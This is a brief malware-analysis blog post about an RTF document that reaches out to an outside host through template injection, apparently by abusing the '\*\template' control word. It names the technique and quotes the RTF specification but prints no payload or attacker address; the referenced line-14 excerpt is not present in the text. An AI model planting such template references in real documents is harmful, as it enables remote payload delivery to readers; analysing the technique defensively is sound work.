RTF template injection
This post was authored by Fareed.
Based on Automated analysis, this RTF file have communicate with a DNS name but unfortunately, the DNS have been resolved to 127.0.0.1.
Knowing the RTF file made a request to external host, our analyst begin investigate the RTF file using text editor to find any string related to the DNS which is contain at line 14 as shown below:
Based on http://ftp.artifax.net/ArtRep/2.0/Help/rtf.htm, control word "\*\template" describes "Destination; the argument is the name of a related template file; it must be enclosed in braces. This is a destination control word.".
Reading the function of the control word, we can understand that this control word can be abuse using template injection technique as the attacker does.